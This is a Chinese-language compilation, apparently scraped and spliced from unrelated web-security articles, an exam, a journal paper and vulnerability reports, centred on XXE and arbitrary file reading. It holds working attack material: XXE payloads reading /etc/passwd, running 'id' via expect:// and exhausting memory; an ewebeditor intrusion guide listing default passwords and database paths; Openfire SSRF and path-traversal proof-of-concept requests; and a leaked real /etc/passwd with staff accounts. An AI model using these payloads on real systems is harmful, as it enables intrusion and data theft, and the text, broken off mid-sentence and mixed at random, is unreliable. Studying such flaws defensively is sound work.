【Web攻防】第四节 XXE漏洞利用 任意文件读取

简单易懂的Web安全漏洞原理与攻防实战Web安全漏洞原理与攻防实战在互联网时代，Web安全已经成为了一个重要的话题。

而Web安全漏洞又是Web安全中不可避免的一部分。

本文将通过简单易懂的方式，介绍Web 安全漏洞的原理以及相应的攻防实战。

一、Web安全漏洞原理Web安全漏洞是指Web应用程序中存在的可以被黑客利用的漏洞。

通常，这些漏洞源于编码或设计错误。

安全漏洞可以被利用来执行未授权的操作，造成数据泄露或服务拒绝等严重后果。

Web安全漏洞通常可以分为以下几种类型：1. SQL注入漏洞SQL注入漏洞是指黑客通过在输入框中输入SQL语句的恶意内容，从而扰乱数据库的运作，达到获取、删除、修改、添加数据等非法目的的行为。

2. XSS漏洞XSS（Cross Site Scripting）漏洞是一种常见的Web安全漏洞，它允许攻击者将恶意脚本注入到网页中，从而在用户浏览器中执行。

这种攻击可以让攻击者窃取用户的信息，甚至劫持用户的会话。

3. CSRF漏洞CSRF（Cross-Site Request Forgery）漏洞是一种难以察觉的Web安全漏洞，它可以让攻击者在用户不知情的情况下执行欺诈性的请求，例如转账、修改密码等。

4. 文件上传漏洞文件上传漏洞是指黑客利用Web应用程序中的漏洞，上传包含恶意代码的文件，从而站点可能会受到攻击，最终导致黑客接管服务器等严重后果。

二、攻防实战安全漏洞的存在给我们的网络安全带来了威胁，为了更好地保护我们的数据和财产，我们需要以攻击者的方式来思考，并且积极进行攻防实战。

1. 针对SQL注入漏洞的攻防实战攻击：一种典型的SQL注入攻击方式是通过在提交表单中输入特殊字符，例如‘OR ‘1=1’，从而绕过PHP代码的SQL过滤函数，造成数据库被攻击者控制，从而实现非法目的。

防御：PHP代码中应该加入过滤功能，在提交表单中过滤掉特殊字符。

2. 针对XSS漏洞的攻防实战攻击：黑客会利用XSS漏洞在网页中插入恶意脚本，从而劫持用户会话、窃取用户信息等。

Web安全漏洞的研究作者：李永钢彭云峰来源：《科技视界》2014年第32期【摘要】Web信息系统已经在当今的各个领域广泛应用，而这些基于Web的应用系统在网络环境中正面临着安全方面的威胁。

本文总结了常见的Web安全漏洞和Web攻击方法，探讨了Web安全的主要技术，并提出了应对这些安全威胁的防范措施，这些措施将对设计人员、开发人员、架构师和管理人员有益。

【关键词】Web安全漏洞;Web系统;信息技术0 引言近些年来，国内的各个领域行业都在上线基于Web的信息系统，这些Web信息系统可以为用户提供快捷的服务，为企事业单位提供业务支持和方便的信息管理。

然而开发人员和管理人员往往却忽略了Web系统的安全性，这些人员对安全问题不够重视，缺乏有效防范的经验，上线系统也没有经过全面的安全测试。

随着这些Web系统的使用，各种安全漏洞也会逐渐的暴露出来。

基于HTTP的服务是世界上应用最广泛的服务，但是HTTP请求并不会被防火墙所拦截，操作系统和其他防护软件通常也不会对这些请求进行仔细检查，所以Web站点常被黑客入侵，Web信息系统常遭受攻击。

OWASP（开放式Web应用程序安全项目）列出了“Web系统十大安全隐患”，靠前的包括SQL注入攻击、跨站点脚本、URL非限制访问等。

因此，Web信息系统在上线之前不仅要做功能上的测试，还非常有必要做安全性的测试，开发者需要及早发现Web系统中的全漏洞，防范潜在的安全隐患。

1 常见的Web安全漏洞1.1 SQL注入（SQL injection）SQL注入攻击是多连接的应用程序中的一种常见漏洞，它利用SQL的语法在程序代码预先定义好的字符拼接SQL语句中添加额外的SQL语句元素，欺骗数据库服务器执行非授权的任意查询，篡改和执行命令。

因为各种数据库管理系统DBMS有其自身的特点，所以攻击者使用的实际代码也不尽相同。

在所有Web系统漏洞中，SQL注入的风险最高，因为SQL注入攻击能够轻易的绕过操作系统防火墙并直接访问数据库，甚至能够获得DBMS所在的服务器的管理员权限。

渗透考试试题及答案渗透考试试题：一、选择题（每题2分，共20分）1.渗透测试是一种针对信息系统的攻击测试，目的是：A. 确定系统的安全漏洞B. 破坏系统的数据完整性C. 拒绝系统的服务D. 窃取系统的用户信息2.以下哪个不是密码破解的常用方法？A.暴力破解B.字典攻击C.社交工程D.蜜罐攻击3.在网络渗透测试中，通过发送大量无效数据包或恶意请求来占用服务器资源，以拒绝合法用户的服务，这种攻击方式被称为：A. DDoS攻击B. XSS攻击C. SQL注入攻击D. CSRF攻击4.以下哪项不是网络渗透测试的主要步骤？A.信息收集B.漏洞评估C.安全策略审计D.后渗透攻击5.网站渗透测试中，以下哪个工具可以用于扫描目标网站的漏洞？A. NmapB. WiresharkC. MetasploitD. Nessus6.以下哪种加密算法是对称加密算法？A. RSAB. AESC. HMACD. MD57.社交工程是指通过利用人的弱点或者不安全行为来获取信息或者未授权访问系统的一种攻击方式，以下哪个是社交工程的常见手段？A. 钓鱼邮件B. XSS攻击C. DOS攻击D. SQL注入攻击8.以下哪种漏洞可以通过向用户注入恶意代码来进行攻击？A. XSS漏洞B. CSRF漏洞C. SQL注入漏洞D. RCE漏洞9.SQL注入攻击是通过在用户输入数据中注入SQL语句，从而实现非法访问或者获取数据库信息的攻击方式。

以下哪种防御措施可以减少SQL注入攻击的风险？A. 输入验证与过滤B. 强制访问控制C. 防火墙配置D. 加密存储数据库密码10.以下哪种测试方法是被动的，不对系统发起攻击？A. 黑盒测试B. 白盒测试C. 灰盒测试D. 红队演练二、简答题（每题10分，共30分）1.请简要描述为什么渗透测试在信息安全领域中非常重要？答：渗透测试是一种主动的安全评估方法，可以帮助组织发现和解决系统及应用程序存在的安全漏洞和风险。

一、XML基础知识XML用于标记电子文件使其具有结构性的标记语言，可以用来标记数据、定义数据类型，是一种允许用户对自己的标记语言进行定义的源语言。

XML文档结构包括XML声明、DTD文档类型定义（可选）、文档元素。

DTD（文档类型定义）的作用是定义XML 文档的合法构建模块。

DTD 可以在XML 文档内声明，也可以外部引用。

内部声明DTD根元素[元素声明]>引用外部DTD根元素SYSTEM "文件名">或者根元素PUBLIC "public_ID" "文件名">DTD实体是用于定义引用普通文本或特殊字符的快捷方式的变量，可以内部声明或外部引用。

内部声明实体实体名称"实体的值">引用外部实体实体名称SYSTEM "URI">或者实体名称PUBLIC "public_ID" "URI">二、XML外部实体注入(X ML E x ternal E ntity)当允许引用外部实体时，通过构造恶意内容，可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。

引入外部实体方式有多种，比如：恶意引入外部实体方式1：XML内容：恶意引入外部实体方式2：XML内容：DTD文件(evil.dtd)内容：恶意引入外部实体方式3：XML内容：DTD文件(evil.dtd)内容：另外，不同程序支持的协议不一样，上图是默认支持协议，还可以支持其他，如PHP支持的扩展协议有以下举例说明XXE危害，当然XXE不止这些危害。

XXE危害1：读取任意文件该CASE是读取/etc/passwd，有些XML解析库支持列目录，攻击者通过列目录、读文件，获取帐号密码后进一步攻击，如读取tomcat-users.xml得到帐号密码后登录tomcat 的manager部署webshell。

任意文件写入漏洞常见函数
任意文件写入漏洞是一种常见的安全漏洞，在编写代码时需要特别注意。

以下是几种常见的函数，容易导致任意文件写入漏洞：
1. file_put_contents：该函数可以将字符串写入文件中，但是如果传入的文件路径没有经过过滤，攻击者可以将任意内容写入到指定的文件中。

2. fwrite：该函数可以将数据写入到文件中，同样存在任意文件写入漏洞。

3. move_uploaded_file：该函数用于将上传的文件移动到指定的目录中，如果没有对上传的文件进行严格的检查，攻击者可以通过上传恶意文件的方式进行攻击。

4. copy：该函数用于将文件拷贝到指定的目录中，同样存在任意文件写入漏洞。

为了避免任意文件写入漏洞的发生，我们需要在编写代码时对文件路径进行严格的过滤和检查，确保只有合法的路径才能被写入或移动到指定的目录中。

同时，我们也需要在上传文件时进行严格的检查，防止上传恶意文件给应用程序带来安全风险。

- 1 -。

Web应用安全攻防手段全面梳理Web应用已成为人们日常生活中必不可少的一部分，越来越多的个人和企业都会在谷歌、百度等搜索引擎上搜寻所需要的信息，同时也会在社交媒体、在线购物、金融等领域中使用Web应用，不断地将自己的信息暴露在互联网上。

然而，随着现代社会的高速发展，网络犯罪和黑客攻击的频率也越来越高，所以Web应用的安全性问题正在变得愈加突出。

这篇文章旨在全面梳理Web应用安全攻防手段，以帮助Web应用开发者更好地保护自己的应用和用户数据。

一、常见的Web应用漏洞1. 跨站脚本（XSS）漏洞XSS漏洞是Web应用最常见的漏洞之一，攻击者通过在Web页面中注入恶意脚本来获取用户的信息，如登录密码、cookie信息等。

这类攻击主要针对使用JavaScript的网站或网络应用程序。

为了防止XSS漏洞，开发者应该过滤用户的输入和输出，避免使用eval函数等危险的JavaScript代码。

2. SQL注入漏洞SQL注入漏洞是通过提交恶意SQL语句，来获得Web应用程序服务器中数据的一种攻击方式。

当Web应用程序使用动态构建SQL语句时，黑客通过提交特殊的SQL语句来注入数据库，从而获取、修改或删除敏感的数据。

为了避免SQL注入漏洞，开发人员应该使用参数化查询语句或者存储过程，防止拼接字符串的方式处理SQL查询。

3. CSRF（Cross-site Request Forgery）攻击CSRF攻击是一种利用用户的登录状态来执行未经许可的操作的攻击方式。

黑客通过欺骗目标用户点击链接或提交表单的方式，来使用户在不知情的情况下执行恶意请求。

为了防止CSRF攻击，开发者可以使用随机令牌、验证HTTP Referer等方式，防止攻击者篡改用户的请求。

4. 目录遍历漏洞目录遍历漏洞是一种攻击方式，攻击者通过突破应用程序中的安全限制来访问Web服务器上的敏感文件。

特别是在Web应用程序中使用相对路径时，攻击者可以轻易地获取到服务器上的敏感信息。

本文部分内容来自网络整理，本司不为其真实性负责，如有异议或侵权请及时联系，本司将立即删除！== 本文为word格式，下载后可方便编辑和修改！ ==ewebeditor漏洞利用总结课件 4ewebeditor漏洞利用总结先从最基本的记录起！通常入侵ewebeditor编辑器的步骤如下:1、首先访问默认管理页看是否存在。

默认管理页地址2.80以前为 ewebeditor/admin_login.asp以后版本为admin/login.asp (各种语言的大家自己改后缀，本文就以asp来进行说明，下面不再细说了！)2、默认管理帐号密码！默认管理页存在！我们就用帐号密码登陆！默认帐号密码为: admin admin888 ！常用的密码还有admin admin999 admin1 admin000 之类的。

3、默认数据库地址。

如果密码不是默认的。

我们就访问是不是默认数据库！尝试下载数据库得到管理员密码！管理员的帐号密码，都在eWebEditor_System表段里，sys_UserName Sys_UserPass 都是md5加密的。

得到了加密密码。

可以去 等网站进行查询！暴力这活好久不干了！也可以丢国外一些可以跑密码的网站去跑!默认数据库路径为: ewebeditor/db/ewebeditor.mdb 常用数据库路径为:ewebeditor/db/ewebeditor.asa ewebeditor/db/ewebeditor.asp ewebeditor/db/#ewebeditor.asa ewebeditor/db/#ewebeditor.mdbewebeditor/db/!@#ewebeditor.asp ewebeditor/db/ewebeditor1033.mdb 等很多管理员常改.asp后缀，一般访问.asp .asa 后缀的都是乱码！可以用下载工具下载下来，然后更改后缀为.mdb 来查看内容！4、说说漏洞基本利用步骤，还以asp为例！登陆后台以后。

OpenfireAdminConsoleSSRF任意⽂件读取漏洞CVE-2019-1839。

Openfire（以前称为Wildfire和Jive Messenger）是⼀个即時通訊（IM）和群聊服务器，它使⽤Java编写的XMPP服务器，并以Apache License 2.0发布。

SSRF CVE-2019-18394该漏洞允许未授权⽤户发起SSRF攻击，相关代码如下FaviconServlet.java...public void doGet(HttpServletRequest request, HttpServletResponse response) {String host = request.getParameter("host");// Check special cases where we need to change host to get a faviconhost = "".equals(host) ? "" : host;byte[] bytes = getImage(host, defaultBytes);if (bytes != null) {writeBytesToStream(bytes, response);}}private byte[] getImage(String host, byte[] defaultImage) {// If we've already attempted to get the favicon twice and failed,// return the default image.if (missesCache.get(host) != null && missesCache.get(host) > 1) {// Domain does not have a favicon so return default iconreturn defaultImage;}// See if we've cached the favicon.if (hitsCache.containsKey(host)) {return hitsCache.get(host);}byte[] bytes = getImage("http://" + host + "/favicon.ico");....}...很简单的⼀个漏洞，poc如下GET /getFavicon?host=192.168.176.1:8080/secrets.txt? HTTP/1.1修复⽅法如下任意⽂件读取漏洞该漏洞只影响windows下安装openfire的⽤户，相关代码如下PluginServlet.java...@Overridepublic void service(HttpServletRequest request, HttpServletResponse response) {String pathInfo = request.getPathInfo();if (pathInfo == null) {response.setStatus(HttpServletResponse.SC_NOT_FOUND);}else {try {// Handle JSP requests.if (pathInfo.endsWith(".jsp")) {...}// Handle servlet requests.else if (getServlet(pathInfo) != null) {handleServlet(pathInfo, request, response);}// Handle image/other requests.else {handleOtherRequest(pathInfo, response);}}...}private void handleOtherRequest(String pathInfo, HttpServletResponse response) throws IOException { String[] parts = pathInfo.split("/");// Image request must be in correct format.if (parts.length < 3) {response.setStatus(HttpServletResponse.SC_NOT_FOUND);return;}String contextPath = "";int index = pathInfo.indexOf(parts[1]);if (index != -1) {contextPath = pathInfo.substring(index + parts[1].length());}File pluginDirectory = new File(JiveGlobals.getHomeDirectory(), "plugins");File file = new File(pluginDirectory, parts[1] + File.separator + "web" + contextPath);// When using dev environment, the images dir may be under something other that web.Plugin plugin = pluginManager.getPlugin(parts[1]);...}poc如下GET /plugins/search/..\..\..\conf\openfire.xml HTTP/1.1Host: localhost:9090Cookie: JSESSIONID=node01aaib5x4g4p781q3i2m2tm74u91.node0;修复⽅法如下参考。

常见漏洞及其解决方法漏洞是指系统、应用程序或网络中的安全弱点，黑客可以利用这些弱点进行非法的入侵、攻击或数据泄露。

为了保护系统和应用程序的安全，我们需要了解一些常见的漏洞以及相应的解决方法。

1.缓冲区溢出漏洞：缓冲区溢出是指向缓冲区写入超出其容量的数据，导致覆盖相邻的内存区域，进而执行恶意代码。

解决方法包括使用输入合法性校验、避免使用不安全的函数、使用安全的编程语言和编译器等。

2.跨站脚本攻击（XSS）漏洞：XSS漏洞是指攻击者通过植入恶意的客户端脚本（通常是JavaScript代码）来获得访问用户敏感信息的权限。

解决方法包括对输入进行过滤和验证、使用安全的HTML转义函数、设置HttpOnly Cookie等。

3.SQL注入漏洞：SQL注入是指攻击者通过向应用程序的输入中插入恶意的SQL语句，从而绕过身份验证、读取、修改或删除数据库中的数据。

解决方法包括使用参数化查询、输入验证和过滤、最小权限原则和避免动态拼接SQL语句。

4.跨站点请求伪造（CSRF）漏洞：CSRF漏洞是指攻击者通过伪造用户的身份发起跨站点请求，从而执行未经授权的操作。

解决方法包括使用随机令牌进行验证、添加Referer检查、设置SameSite Cookie属性等。

5.XML外部实体（XXE）漏洞：XXE漏洞是指攻击者通过操纵XML解析器的实体引用，读取任意文件或执行远程命令。

解决方法包括禁用外部实体解析、使用安全的XML解析器、限制实体扩展等。

6.逻辑漏洞：逻辑漏洞是指应用程序在设计或实现上存在错误，导致不符合预期的行为或逻辑漏洞。

解决方法包括使用代码审计和静态分析工具、执行全面的测试和漏洞扫描、修复设计和实现上的错误等。

7.未经身份验证访问漏洞：未经身份验证访问漏洞是指应用程序没有正确验证用户身份就允许执行敏感操作或访问受限资源。

解决方法包括强制身份验证、实现访问控制列表（ACL）、使用多因素身份验证等。

8.文件上传漏洞：文件上传漏洞是指攻击者通过上传恶意文件来执行任意代码、修改、删除或覆盖系统文件。

XXE漏洞利⽤思路转⾃：⼀、XXE 是什么介绍 XXE 之前，我先来说⼀下普通的 XML 注⼊，这个的利⽤⾯⽐较狭窄，如果有的话应该也是逻辑漏洞如图所⽰：既然能插⼊ XML 代码，那我们肯定不能善罢⽢休，我们需要更多，于是出现了 XXEXXE(XML External Entity Injection) 全称为 XML 外部实体注⼊，从名字就能看出来，这是⼀个注⼊漏洞，注⼊的是什么？XML外部实体。

(看到这⾥肯定有⼈要说：你这不是在废话)，固然，其实我这⾥废话只是想强调我们的利⽤点是 外部实体 ，也是提醒读者将注意⼒集中于外部实体中，⽽不要被 XML 中其他的⼀些名字相似的东西扰乱了思维(盯好外部实体就⾏了)，如果能注⼊ 外部实体并且成功解析的话，这就会⼤⼤拓宽我们 XML 注⼊的攻击⾯（这可能就是为什么单独说 ⽽没有说 XML 注⼊的原因吧，或许普通的 XML 注⼊真的太鸡肋了，现实中⼏乎⽤不到）⼆、简单介绍⼀下背景知识：XML是⼀种⾮常流⾏的标记语⾔，在1990年代后期⾸次标准化，并被⽆数的软件项⽬所采⽤。

它⽤于配置⽂件，⽂档格式（如OOXML，ODF，PDF，RSS，...），图像格式（SVG，EXIF标题）和⽹络协议（WebDAV，CalDAV，XMLRPC，SOAP，XMPP，SAML， XACML，...），他应⽤的如此的普遍以⾄于他出现的任何问题都会带来灾难性的结果。

在解析外部实体的过程中，XML解析器可以根据URL中指定的⽅案（协议）来查询各种⽹络协议和服务（DNS，FTP，HTTP，SMB等）。

外部实体对于在⽂档中创建动态引⽤⾮常有⽤，这样对引⽤资源所做的任何更改都会在⽂档中⾃动更新。

但是，在处理外部实体时，可以针对应⽤程序启动许多攻击。

这些攻击包括泄露本地系统⽂件，这些⽂件可能包含密码和私⼈⽤户数据等敏感数据，或利⽤各种⽅案的⽹络访问功能来操纵内部应⽤程序。

通过将这些攻击与其他实现缺陷相结合，这些攻击的范围可以扩展到客户端内存损坏，任意代码执⾏，甚⾄服务中断，具体取决于这些攻击的上下⽂。

DOI:10.19392/ki.1671-7341.201819049XXE 漏洞及其防御策略研究应宗浩㊀金㊀海兰州理工大学㊀甘肃兰州㊀730050摘㊀要:XXE 漏洞是近年来产生的影响比较大的漏洞之一,能够任意读取文件,远程执行命令,造成拒绝服务攻击等㊂该文通过xxe 漏洞背景介绍,给出相应的攻击手段,并提出防御策略,以期能够引起人们对xxe 漏洞的重视,并加强相关方面的安全开发工作㊂关键词:XXE ;漏洞;攻击手段;防御策略㊀㊀XML 是用于标记电子文件使其具有结构性的标记语言,允许用户对自己的标记语言进行定义㊂Web 端,移动端,云端等客户端技术使用XML 向业务应用程序发送消息㊂为了使应用程序使用自定义的XML 消息,应用程序必须去解析XML 文档并检查格式是否正确㊂较早的或配置错误的XML 处理器无法准确评估XML 文件中的外部实体引用㊂攻击者可以利用外部实体发动攻击㊂此种攻击行为称之为XXE(XML Enternal Entity Injection),即XML 外部实体注入攻击㊂1XML 基础XML 文档结构包括XML 声明㊁DTD 文档类型定义(可选)㊁文档元素㊂以下是一个典型xml 文档<?xml version ="1.0"?><! -xml 声明 -><!DOCTYPE note [<! DTD 文档类型定义,定义此文档是note 类型的文档--><!ELEMENT note (head,body)><!--定义note 元素有四个元素--><!ELEMENT head (#PCDATA)><!--定义head 元素为 #PCDATA 类型--><!ELEMENT body (#PCDATA)><!--定义body 元素为 #PCDATA 类型-->]><note><head>Reminder</head><! 文档元素--><body>You are a good man </body ><! 文档元素--></note>DTD(文档类型定义)的作用是定义XML 文档的合法构建模块㊂DTD 可以在XML 文档内声明,也可以外部引用㊂XXE 漏洞关注的是外部实体引用,外部实体引用的代码如下:<!ENTITY 实体名称SYSTEM "URI">2xxe 典型攻击手段2.1任意读取文件<!DOCTYPE foo [<!ENTITY mytest SYSTEMfile:///etc /passwd>]><mydemo>&mytest;</mydemo>代码可以读取/etc /passwd,file 部分可以替换任意文件路径,使得攻击者能够任意读取文件㊂2.2执行系统命令<!DOCTYPEmytest [<!ELEMENT name ANY ><!ENTITY mytest SYSTEM "expect://id">]><root><name>&mytest;</name></root>该代码能够在服务器上执行 id 命令, id 命令可以替换为其他系统命令,通过执行系统命令.2.3拒绝服务攻击<!DOCTYPE data [<!ENTITY a0"dos"><!ENTITY a1"&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;"><!ENTITY a2"&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;"><!ENTITY a3"&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;"><!ENTITY a4"&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">]><data>&a4;</data>该代码通过创建一项递归的XML 定义,构造恶意的XML 实体文件耗尽可用内存,造成拒绝服务攻击㊂3XXE 防御策略大部分XML 解析器无法正确解析xxe 攻击中的实体㊂因此可以配置XML 处理器去使用本地静态的DTD,不允许XML 中含有自声明的DTD㊂可以使用开发语言提供的禁用外部实体的方法,从而避免基于XXE 漏洞的攻击㊂另外,升级libxml 版本至2.9.0,libxml 2.9.0以后默认不解析外部实体,也可以通过升级libxml 版本进行xxe 防御㊂参考文献:[1]开放式Web 应用程序安全项目.OWASP Top 102017[EB /OL ].http :// /owasp-project /OWASP-Top102017v1.3.pdf ,2017-12-01.[2]Mark4z5.未知攻焉知防 XXE 漏洞攻防[EB /OL ].https :// /index.php /blog /msg /69,2014-09-23.[3]丁跃潮,张涛.XML 实用教程[M ].北京:北京大学出版社,2006.[4]ChristopherSpäth ,ChristianMainka ,VladislavMladenov.DTD /XXE-cheatsheat.web-in-security.blogspot.de /2016/03/xxe-cheat-sheet.html.2016-03-03.作者简介:应宗浩(1997-),男,浙江温州人,本科在读,研究方向:信息安全,物联网安全㊂45电子信息科技风2018年7月。

春秋云境解题大全
春秋云境是一个虚拟的网络安全挑战平台，类似于网络攻防演练环境。

解题大全主要涉及如何解决春秋云境中出现的各种网络安全问题，包括但不限于：
1. 漏洞扫描和利用：利用漏洞扫描工具对目标系统进行漏洞扫描，发现可利用的漏洞，并利用漏洞进行攻击和入侵。

2. 密码破解和绕过：尝试破解或绕过目标系统的密码保护机制，获得对目标系统的访问权限。

3. 文件包含漏洞：利用文件包含漏洞，通过包含恶意文件来执行恶意代码或获取敏感信息。

4. 命令注入漏洞：利用命令注入漏洞，通过注入恶意命令来执行任意命令或获取敏感信息。

5. XXE（XML外部实体）漏洞：利用XXE漏洞，读取目标系统上的任意文
件或执行任意命令。

6. 反序列化漏洞：利用反序列化漏洞，通过反序列化恶意数据来执行任意代码或获取敏感信息。

7. 文件上传漏洞：利用文件上传漏洞，上传恶意文件并执行恶意代码。

8. 其他类型的漏洞：例如SQL注入、跨站脚本攻击（XSS）等。

解决春秋云境中的问题需要具备一定的网络安全知识和技能，包括但不限于：了解常见的网络安全漏洞和攻击手段、熟悉各种网络协议和网络工具的使用、具备一定的编程和调试能力等。

同时，还需要仔细分析问题描述和背景，制定合适的攻击策略和防御措施，并不断学习和实践，提高自己的网络安全技能和意识。

xxe漏洞原理与防御xml基础知识要了解xxe漏洞，那么一定得先明白基础知识，了解xml文档的基础组成。

另外php版本大于5.4.45的默认不解析外部实体XML用于标记电子文件使其具有结构性的标记语言，可以用来标记数据、定义数据类型，是一种允许用户对自己的标记语言进行定义的源语言。

XML文档结构包括XML声明、DTD文档类型定义（可选）、文档元素为什么使用 DTD？通过DTD，您的每一个XML 文件均可携带一个有关其自身格式的描述。

通过DTD，独立的团体可一致地使用某个标准的DTD 来交换数据。

而您的应用程序也可使用某个标准的 DTD 来验证从外部接收到的数据。

您还可以使用 DTD 来验证您自身的数据。

xml文档的构建模块所有的XML 文档（以及HTML 文档）均由以下简单的构建模块构成：•元素•属性•实体•PCDATA•CDATA下面是每个构建模块的简要描述。

1，元素元素是XML 以及HTML 文档的主要构建模块，元素可包含文本、其他元素或者是空的。

实例:1.<body>body text in between</body>2.<message>some message in between</message>空的 HTML 元素的例子是 'hr'、'br' 以及 'img'。

2，属性属性可提供有关元素的额外信息实例：<img src='computer.gif' />3，实体实体是用来定义普通文本的变量。

实体引用是对实体的引用。

4，PCDATAPCDATA 的意思是被解析的字符数据（parsed character data）。

PCDATA 是会被解析器解析的文本。

这些文本将被解析器检查实体以及标记。

5，CDATACDATA 的意思是字符数据（character data）。

XXE漏洞学习0x00 什么是XML1.定义XML⽤于标记电⼦⽂件使其具有结构性的标记语⾔，可以⽤来标记数据、定义数据类型，是⼀种允许⽤户对⾃⼰的标记语⾔进⾏定义的源语⾔。

XML⽂档结构包括XML声明、DTD⽂档类型定义（可选）、⽂档元素。

2.⽂档结构XML⽂档结构包括XML声明、DTD⽂档类型定义（可选）、⽂档元素。

<!--XML声明--><?xml version="1.0"?><!--⽂档类型定义--><!DOCTYPE note [ <!--定义此⽂档是 note 类型的⽂档--><!ELEMENT note (to,from,heading,body)><!--定义note元素有四个元素--><!ELEMENT to (#PCDATA)><!--定义to元素为”#PCDATA”类型--><!ELEMENT from (#PCDATA)><!--定义from元素为”#PCDATA”类型--><!ELEMENT head (#PCDATA)><!--定义head元素为”#PCDATA”类型--><!ELEMENT body (#PCDATA)><!--定义body元素为”#PCDATA”类型-->]]]><!--⽂档元素--><note><to>Dave</to><from>Tom</from><head>Reminder</head><body>You are a good man</body></note>3.DTDXML⽂档结构包括XML声明、DTD⽂档类型定义（可选）、⽂档元素。

SAE新浪云后端任意文件读取漏洞及修复漏洞预警-电脑资料要描述：新浪SAE使用了一个不安全的第三方组件，可能导致任意读取后端的文件是一个mysql管理端，使用了phpmyadmin，根据最近80sec在wooyun上发布的phpmyadmin任意文件读取漏洞即可读取其他文件，同时由于该应用部署在比较敏感的后端上，不受沙盒限制漏洞证明：root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinnews:x:9:13:news:/etc/news:uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologinnscd:x:28:28:NSCD Daemon:/:/sbin/nologinntp:x:38:38::/etc/ntp:/sbin/nologinvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologinoprofile:x:16:16:Special user account to be used byOProfile:/home/oprofile:/sbin/nologinsysmon:x:60422:60422::/nonexistent:/nologinsshd:x:500:500::/home/sshd:/sbin/nologinpcap:x:77:77::/var/arpwatch:/sbin/nologindbus:x:81:81:System message bus:/:/sbin/nologinavahi:x:70:70:Avahi daemon:/:/sbin/nologinrpc:x:32:32:Portmapper RPC user:/:/sbin/nologinxfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologinmailnull:x:47:47::/var/spool/mqueue:/sbin/nologinsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologinrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologinhaldaemon:x:68:68:HAL daemon:/:/sbin/nologinavahi-autoipd:x:100:104:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologinsabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin www:x:80:80::/usr/local/sinasrv2:/sbin/nologinmysql:x:3306:3306::/usr/local/mysql:/sbin/nologinnagios:x:101:105:nagios:/var/log/nagios:/sbin/nologinxiongjun:x:3307:3308::/usr/home/xiongjun:/bin/bashyongri:x:3308:3309::/usr/home/yongri:/bin/bashxiaoyue1:x:3309:3310::/usr/home/xiaoyue1:/bin/bashpengjie:x:3310:3311::/usr/home/pengjie:/bin/bashweiliang:x:3311:3312::/usr/home/weiliang:/bin/bashwangliang4:x:3312:3313::/usr/home/wangliang4:/bin/bash yuli3:x:3313:3314::/usr/home/yuli3:/bin/bashleilei3:x:3315:3316::/usr/home/leilei3:/bin/bashxixi1:x:3316:3317::/usr/home/xixi1:/bin/bash001ee000-00281000 r-xp 00000000 fd:01 83285/usr/lib/libkrb5.so.3.300281000-00284000 rw-p 00092000 fd:01 83285 /usr/lib/libkrb5.so.3.3002ba000-002df000 r-xp 00000000 fd:01 83284 /usr/lib/libk5crypto.so.3.1002df000-002e0000 rw-p 00025000 fd:01 83284 /usr/lib/libk5crypto.so.3.100364000-00391000 r-xp 00000000 fd:01 83286 /usr/lib/libgssapi_krb5.so.2.200391000-00392000 rw-p 0002d000 fd:01 83286 /usr/lib/libgssapi_krb5.so.2.200394000-003b3000 r-xp 00000000 fd:01 1757638 /lib/libexpat.so.0.5.0003b3000-003b5000 rw-p 0001e000 fd:01 1757638 /lib/libexpat.so.0.5.0003b7000-004e3000 r-xp 00000000 fd:01 75901 /usr/lib/libxml2.so.2.6.26004e3000-004e8000 rw-p 0012c000 fd:01 75901 /usr/lib/libxml2.so.2.6.26004e8000-004e9000 rw-p 00000000 00:00 000606000-00620000 r-xp 00000000 fd:01 1757619 /lib/ld-2.5.so00620000-00621000 r--p 00019000 fd:01 1757619 /lib/ld-2.5.so00621000-00622000 rw-p 0001a000 fd:01 1757619 /lib/ld-2.5.so00629000-00768000 r-xp 00000000 fd:01 1757620 /lib/libc-2.5.so00768000-0076a000 r--p 0013f000 fd:01 1757620 /lib/libc-2.5.so0076a000-0076b000 rw-p 00141000 fd:01 1757620 /lib/libc-2.5.so0076b000-0076e000 rw-p 00000000 00:00 000770000-00772000 r-xp 00000000 fd:01 1755873 /lib/libdl-2.5.so00772000-00773000 r--p 00001000 fd:01 1755873 /lib/libdl-2.5.so00773000-00774000 rw-p 00002000 fd:01 1755873 /lib/libdl-2.5.so00776000-0079b000 r-xp 00000000 fd:01 1757630 /lib/libm-2.5.so0079b000-0079c000 r--p 00024000 fd:01 1757630 /lib/libm-2.5.so0079c000-0079d000 rw-p 00025000 fd:01 1757630 /lib/libm-2.5.so0079f000-007b2000 r-xp 00000000 fd:01 1757623 /lib/libpthread-2.5.so007b2000-007b3000 r--p 00013000 fd:01 1757623 /lib/libpthread-2.5.so007b3000-007b4000 rw-p 00014000 fd:01 1757623 /lib/libpthread-2.5.so007b4000-007b6000 rw-p 00000000 00:00 0007b8000-007ca000 r-xp 00000000 fd:01 70077 /usr/lib/libz.so.1.2.3007ca000-007cb000 rw-p 00011000 fd:01 70077 /usr/lib/libz.so.1.2.3007cd000-007d4000 r-xp 00000000 fd:01 1757624 /lib/librt-2.5.so007d4000-007d5000 r--p 00006000 fd:01 1757624 